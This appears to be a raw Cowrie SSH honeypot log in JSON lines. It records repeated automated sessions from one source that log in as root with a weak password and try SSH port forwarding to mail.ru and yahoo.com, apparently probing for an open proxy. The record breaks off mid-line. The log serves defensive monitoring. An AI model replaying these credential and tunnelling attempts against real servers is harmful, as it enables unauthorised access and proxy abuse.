{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":8932,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe4aff9a59cd","protocol":"ssh","message":"New connection: 77.83.207.83:8932 (1.2.3.4:22) [session: fe4aff9a59cd]","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.149992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.150720Z","src_ip":"77.83.207.83","session":"fe4aff9a59cd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.201886Z","src_ip":"77.83.207.83","session":"fe4aff9a59cd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.455302Z","src_ip":"77.83.207.83","session":"fe4aff9a59cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20774,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20774","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.507853Z","session":"fe4aff9a59cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.559388Z","src_ip":"77.83.207.83","session":"fe4aff9a59cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11185,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11185","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.705197Z","session":"fe4aff9a59cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.756161Z","src_ip":"77.83.207.83","session":"fe4aff9a59cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":19796,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19796","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.901266Z","session":"fe4aff9a59cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:22.952283Z","src_ip":"77.83.207.83","session":"fe4aff9a59cd"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.003951Z","src_ip":"77.83.207.83","session":"fe4aff9a59cd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9016,"dst_ip":"1.2.3.4","dst_port":22,"session":"35c484a36cf2","protocol":"ssh","message":"New connection: 77.83.207.83:9016 (1.2.3.4:22) [session: 35c484a36cf2]","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.054201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.055486Z","src_ip":"77.83.207.83","session":"35c484a36cf2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.107021Z","src_ip":"77.83.207.83","session":"35c484a36cf2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.141481Z","src_ip":"212.227.125.160","session":"87702f8d34a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.142509Z","src_ip":"212.227.125.160","session":"87702f8d34a0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.361460Z","src_ip":"77.83.207.83","session":"35c484a36cf2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4392,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4392","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.413846Z","session":"35c484a36cf2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.465000Z","src_ip":"77.83.207.83","session":"35c484a36cf2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":8710,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:8710","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.609577Z","session":"35c484a36cf2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.661000Z","src_ip":"77.83.207.83","session":"35c484a36cf2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":20517,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:20517","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.805268Z","session":"35c484a36cf2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.856483Z","src_ip":"77.83.207.83","session":"35c484a36cf2"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.908694Z","src_ip":"77.83.207.83","session":"35c484a36cf2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9130,"dst_ip":"1.2.3.4","dst_port":22,"session":"05a9efce4ac0","protocol":"ssh","message":"New connection: 77.83.207.83:9130 (1.2.3.4:22) [session: 05a9efce4ac0]","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.958096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:23.967939Z","src_ip":"77.83.207.83","session":"05a9efce4ac0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.009462Z","src_ip":"77.83.207.83","session":"05a9efce4ac0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.260169Z","src_ip":"77.83.207.83","session":"05a9efce4ac0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20649,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20649","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.311870Z","session":"05a9efce4ac0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.362514Z","src_ip":"77.83.207.83","session":"05a9efce4ac0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":7852,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:7852","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.504703Z","session":"05a9efce4ac0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.555031Z","src_ip":"77.83.207.83","session":"05a9efce4ac0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":12677,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12677","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.696682Z","session":"05a9efce4ac0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.746918Z","src_ip":"77.83.207.83","session":"05a9efce4ac0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.797857Z","src_ip":"77.83.207.83","session":"05a9efce4ac0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9214,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1b175f5646e","protocol":"ssh","message":"New connection: 77.83.207.83:9214 (1.2.3.4:22) [session: e1b175f5646e]","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.848225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.849230Z","src_ip":"77.83.207.83","session":"e1b175f5646e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:24.900633Z","src_ip":"77.83.207.83","session":"e1b175f5646e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.156084Z","src_ip":"77.83.207.83","session":"e1b175f5646e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6748,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6748","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.208307Z","session":"e1b175f5646e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.259698Z","src_ip":"77.83.207.83","session":"e1b175f5646e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27469,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27469","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.405678Z","session":"e1b175f5646e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.457099Z","src_ip":"77.83.207.83","session":"e1b175f5646e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":7330,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7330","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.601727Z","session":"e1b175f5646e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.653566Z","src_ip":"77.83.207.83","session":"e1b175f5646e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.706048Z","src_ip":"77.83.207.83","session":"e1b175f5646e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9285,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7fe4f469ce3","protocol":"ssh","message":"New connection: 77.83.207.83:9285 (1.2.3.4:22) [session: f7fe4f469ce3]","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.754415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:25.755123Z","src_ip":"77.83.207.83","session":"f7fe4f469ce3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","a